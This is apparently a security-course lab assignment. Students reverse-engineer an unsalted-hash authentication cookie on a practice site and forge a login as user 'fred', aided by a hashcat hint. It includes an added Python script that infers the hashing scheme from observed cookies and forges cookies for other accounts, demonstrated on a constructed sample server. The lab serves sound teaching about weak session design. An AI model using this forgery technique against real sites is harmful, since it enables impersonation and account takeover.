Project X6: Reverse-Engineering an Authentication Cookie (15 pts. extra credit)

Purpose

Reverse-engineer an insecure logon process and hack in.

Observing the Target Website

Open a Web browser and visit this site:
http://attack.samsclass.info/cookielogin
Log in with a Name of root and a Password of toor, as shown below.

A Message Board opens, as shown below. Notice the "Welcome" message, showing that you are logged in.

Notice the "AUTH COOKIE" value--a long string of random-looking numbers and letters.

Log out and log in again with the other credentials--"admin" and "password". Examine the cookie.

Log in and out a few times with the same account and note whether the cookie changes between sessions. A value that stays the same for a given account is not a random session token; it is derived from stable fields such as the username or password.

Compare the cookie values with the usernames and passwords you used to figure out how the cookie is constructed: which fields go into it, and what transformation produces the output. When you get it, figure out the cookie for this account:

Username: fred
When you get in, you'll see the page below (with the grayed-out sections visible).

Hint

Look at this list of hash examples, and compare the length and character set of the AUTH COOKIE with the entries there. For an unsalted hex digest the length alone usually identifies the algorithm (32 hex characters for MD5, 40 for SHA-1, 64 for SHA-256):

https://hashcat.net/wiki/doku.php?id=example_hashes
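The procedure above (collect username/password/cookie observations, identify the algorithm from the digest length, then test candidate field combinations until one reproduces every observation) can be automated. The script below is an added example and is not part of the project page or of the target site; it assumes the cookie is an unsalted hex digest, possibly applied more than once, over one of a small list of hypothetical field combinations (the RECIPES labels are our own). The "pretend server" at the bottom is constructed sample data so the script runs offline; it is not a claim about how attack.samsclass.info builds its cookie.

```python
import hashlib

# Hex digest lengths for common unsalted hashes (the hashcat example-hash
# check): the length and character set of a cookie narrow the algorithm down.
ALGORITHMS = {"md5": 32, "sha1": 40, "sha224": 56, "sha256": 64, "sha512": 128}

# Hypothetical ways a site might combine the logon fields before hashing.
# The labels are ours; a real site may use a combination not listed here.
RECIPES = {
    "user":      lambda u, p: u,
    "pass":      lambda u, p: p,
    "user+pass": lambda u, p: u + p,
    "pass+user": lambda u, p: p + u,
    "user:pass": lambda u, p: f"{u}:{p}",
}


def candidate_algorithms(cookie):
    """Algorithms whose hex digest length matches the cookie (empty if not hex)."""
    cookie = cookie.lower()
    if any(ch not in "0123456789abcdef" for ch in cookie):
        return []
    return [name for name, n in ALGORITHMS.items() if n == len(cookie)]


def hash_hex(algo, text, rounds=1):
    """Apply algo to text `rounds` times, re-hashing the lowercase hex digest."""
    digest = text
    for _ in range(rounds):
        digest = hashlib.new(algo, digest.encode()).hexdigest()
    return digest


def explain_cookie(observations, max_rounds=2):
    """Return (algo, recipe, rounds) that reproduces every (username, password,
    cookie) observation, or None if nothing in RECIPES matches all of them.
    Two or more observations are needed to rule out coincidental matches."""
    if not observations:
        return None
    for algo in candidate_algorithms(observations[0][2]):
        for rname, recipe in RECIPES.items():
            for rounds in range(1, max_rounds + 1):
                if all(hash_hex(algo, recipe(u, p), rounds) == c.lower()
                       for u, p, c in observations):
                    return algo, rname, rounds
    return None


def forge_cookie(scheme, username, password=""):
    """Build the cookie for another account once the scheme is known.
    If the recipe ignores the password, an empty one suffices."""
    algo, rname, rounds = scheme
    return hash_hex(algo, RECIPES[rname](username, password), rounds)


# Constructed sample only: a pretend server whose AUTH COOKIE is md5(username).
# This is NOT how the cookielogin site works; it just gives the demo input.
def _pretend_server(username, password):
    return hashlib.md5(username.encode()).hexdigest()


if __name__ == "__main__":
    seen = [(u, p, _pretend_server(u, p))
            for u, p in [("root", "toor"), ("admin", "password")]]
    scheme = explain_cookie(seen)
    print("scheme:", scheme)
    # With a username-only recipe, fred's password is never needed.
    print("cookie for fred:", forge_cookie(scheme, "fred"))
```

The search is ordered so that the simplest explanation (one round of a hash over a single field) is reported first. If explain_cookie returns None, the cookie is either salted, uses a field the observations do not contain, or is not a plain hex digest at all, and the recipe list needs to grow before retrying.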

Saving the Screen Image

Save a FULL DESKTOP image with the filename Proj X6 from Your Name.

Turning in Your Project

Attach the image to cnit.123@gmail.com with a Subject line of Proj X6 from Your Name.


Last modified 10-8-14 4:56 pm
Hint updated 2-24-18